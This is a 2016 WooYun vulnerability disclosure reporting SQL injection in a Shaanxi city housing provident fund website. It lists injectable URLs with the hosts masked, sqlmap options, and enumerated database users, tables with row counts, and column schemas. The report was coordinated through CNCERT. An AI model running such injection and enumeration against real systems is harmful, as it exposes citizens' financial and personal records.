当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192290

漏洞标题:陕西省某市住房公积金管理中心多处存在SQL主任(DBA权限/22个数据库/大量用户/几千万数据可被泄漏)

相关厂商:陕西省住房资金管理中心

漏洞作者: 路人甲

提交时间:2016-04-04 13:30

修复时间:2016-05-21 14:20

公开时间:2016-05-21 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-04: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

数据啊!~~~

详细说明:

注入点:

http://**.**.**.**/Website/newslist.jsp?ColumnCode=m0403
http://**.**.**.**/website/newsshowphoto.jsp?ColumnCode=l07
http://**.**.**.**/Website/contentshow.jsp?ColumnCode=m0301
http://**.**.**.**/Website/newslistm8001.jsp?ColumnCode=m8001
http://**.**.**.**/Website/newslistm0204.jsp?ColumnCode=m0204
http://**.**.**.**/Website/filelist.jsp?ColumnCode=02


ColumnCode均存在注入
使用神器sqlmap测试,添加参数--threads 10 --dbms "Oracle" --level 3 --risk 3

database management system users [29]:
[*] ANONYMOUS
[*] BI
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] GJJMX12
[*] HR
[*] HZGJJWZ
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
available databases [22]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GJJMX12
[*] HR
[*] HZGJJWZ
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
我们就拿当前库来看看里面的数据吧!~~~
总共429个表
Database: GJJMX12
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| GZRZK         | 4972418 |
| GZZGPZK       | 4375675 |
| GZJCZTK       | 1196180 |
| GZBJK         | 1182516 |
| APP_DBTRACE   | 1008941 |
| GJJ_JHDL      | 954132  |
| GZHKK         | 388469  |
| GZPZK         | 281268  |
| GZJBK         | 279636  |
| GZBGK         | 217325  |
| TX_DKHK_YHMXK | 145991  |
| GZBGK_BAK     | 91660   |
| GZZGKLK       | 69975   |
| BM_G096       | 63320   |
| GZJCRSTJK     | 53013   |
| GZSHYJK       | 46992   |
| GZRDK         | 43953   |
| GZZQK         | 41364   |
| GZSHK         | 38676   |
| GZJKK         | 34834   |
| GZDKK         | 21610   |
| BM_E007       | 16390   |
| GZTQK         | 16230   |
| GZZQSPK       | 14198   |
| BM_ZYDB       | 12028   |
| AA11          | 8253    |
| AA14          | 8232    |
| AA13          | 8213    |
| AA12          | 8195    |
| AAGZZGPZK     | 5476    |
| AAGZBJK       | 5409    |
| GZHBK         | 4326    |
| BM_A003       | 4174    |
| GZJZK         | 3806    |
| GZBGK_JBQK    | 3692    |
| GZFXK         | 1955    |
| BM_E009       | 1928    |
| GZDKK_CL      | 1846    |
| LOG_ERR       | 1782    |
| BM_DYDB       | 1695    |
| DABH          | 1648    |
| GZDWBGK       | 1580    |
| GZGJK         | 910     |
| USER_ROLE     | 888     |
| BM_DKDA       | 324     |
| MODULE_FUNC   | 324     |
| LYBJK         | 318     |
| APP_REPORT_DK | 296     |
| GZHKZHBGK     | 291     |
| AAGZPZK       | 258     |
| APP_USER      | 257     |
| GZDKLLK       | 240     |
| GZSQDAK       | 240     |
| APP_REPORT    | 238     |
| BM_LDDB       | 233     |
| GZDKZXK       | 231     |
| MENU_ITEM     | 173     |
| BM_DKTJ       | 168     |
| GZSHBGK       | 81      |
| "PARAMETER"   | 80      |
| GZTZK         | 77      |
| BM_P015       | 72      |
| JCK           | 71      |
| AAGZJKK       | 67      |
| AA10          | 65      |
| GZDKBGK       | 63      |
| AAGZRDK       | 62      |
| BM_KMDY       | 55      |
| GZDWJCBGSPK   | 54      |
| AAGZZYK       | 52      |
| BM_YWMK       | 50      |
| BM_XTCS       | 49      |
| BM_STYH       | 48      |
| GZSHK_LY      | 39      |
| BM_ZXZBBZ     | 37      |
| BM_P012       | 36      |
| BM_ZGBM       | 36      |
| GZDWJCBGK     | 32      |
| GZZCKZQK      | 29      |
| GZBGK_DWQC    | 26      |
| BM_TQCL       | 23      |
| GZZYK         | 20      |
| GZLLK         | 18      |
| APP_ROLE      | 17      |
| BM_A093       | 17      |
| BM_D006       | 15      |
| BM_ZGZW       | 15      |
| BM_A097       | 14      |
| BM_A075       | 13      |
| GZLSK         | 13      |
| BM_A073       | 12      |
| BM_SSQX       | 12      |
| BM_SPWJ       | 11      |
| BM_ZGXL       | 11      |
| BM_ZXZB       | 11      |
| BM_A071       | 10      |
| BM_DBFS       | 10      |
| BM_XTZB       | 9       |
| BM_B012       | 8       |
| BM_HKFS       | 8       |
| BM_HZDW       | 8       |
| BM_TXJY       | 8       |
| BM_ZGZC       | 8       |
| BM_DKZGTJ     | 7       |
| BM_G071       | 7       |
| BM_ZZXM       | 7       |
| BM_ZXJG       | 6       |
| GZRDK_BAK     | 6       |
| NEWS_FJK      | 6       |
| BM_C006       | 5       |
| BM_DKLX       | 5       |
| BM_FWTX       | 5       |
| BM_G067       | 5       |
| BM_KHCL       | 5       |
| BM_TQFW       | 5       |
| BM_XHCL       | 5       |
| BM_XHZM       | 5       |
| BM_ZCXM       | 5       |
| BM_ZGHY       | 5       |
| GZSHDQBGK     | 5       |
| BM_B031       | 4       |
| BM_FZXM       | 4       |
| BM_SRXM       | 4       |
| BM_ZXDJ       | 4       |
| BM_ZYZG       | 4       |
| NZPZ          | 4       |
| BM_A015       | 3       |
| BM_A095       | 3       |
| BM_DKSPJB     | 3       |
| BM_DKSPSC     | 3       |
| BM_LSDA       | 3       |
| BM_SSGX       | 3       |
| BM_XGCL       | 3       |
| BM_XHYY       | 3       |
| BM_ZJLX       | 3       |
| GZJKK_DWDJ    | 3       |
| GZSHDQBGSPK   | 3       |
| NZCW          | 3       |
| TMP_TABLE     | 3       |
| BM_A005       | 2       |
| BM_BGCL       | 2       |
| BM_CXLX       | 2       |
| BM_DYLX       | 2       |
| BM_GJSPJB     | 2       |
| BM_TQSPSC     | 2       |
| BM_ZGZY       | 2       |
| GZPZK_BAK     | 2       |
| LYRDK         | 2       |
| ZCKBAK        | 2       |
| BM_A174       | 1       |
| BM_E013       | 1       |
| BM_FKYH       | 1       |
| BM_G094       | 1       |
| BM_G095       | 1       |
| BM_G139       | 1       |
| GZJKK_BAK     | 1       |
| GZNDK         | 1       |
| GZSHK_ZP      | 1       |
+---------------+---------+
Database: GJJMX12
Table: GZRZK
[13 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| BEGINTIME | DATE     |
| ENDTIME   | DATE     |
| GJDBM     | VARCHAR2 |
| LOGINIP   | VARCHAR2 |
| LOGINMC   | VARCHAR2 |
| LSGXBM    | VARCHAR2 |
| TOPIC     | VARCHAR2 |
| TPCODE    | VARCHAR2 |
| USERID    | VARCHAR2 |
| USERNAME  | VARCHAR2 |
| YWCZBS    | NUMBER   |
| YWCZLB    | VARCHAR2 |
| YWMKBM    | VARCHAR2 |
+-----------+----------+
Database: GJJMX12
Table: GZZGPZK
[21 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| A001   | VARCHAR2 |
| A002   | VARCHAR2 |
| A003   | VARCHAR2 |
| A071   | VARCHAR2 |
| A073   | VARCHAR2 |
| A075   | VARCHAR2 |
| P002   | DATE     |
| P005   | VARCHAR2 |
| P006   | DATE     |
| P007   | VARCHAR2 |
| P008   | NUMBER   |
| P009   | NUMBER   |
| P012   | VARCHAR2 |
| P015   | VARCHAR2 |
| P018   | VARCHAR2 |
| P021   | VARCHAR2 |
| P023   | VARCHAR2 |
| P026   | DATE     |
| P029   | VARCHAR2 |
| P030   | VARCHAR2 |
| PZID   | VARCHAR2 |
+--------+----------+


几千万的数据,只因太慢了,就不继续了!~~~

101.jpg


102.jpg


103.jpg


104.jpg

漏洞证明:

大量的用户,涉及几千万的信息了!~~~

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-06 14:14

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无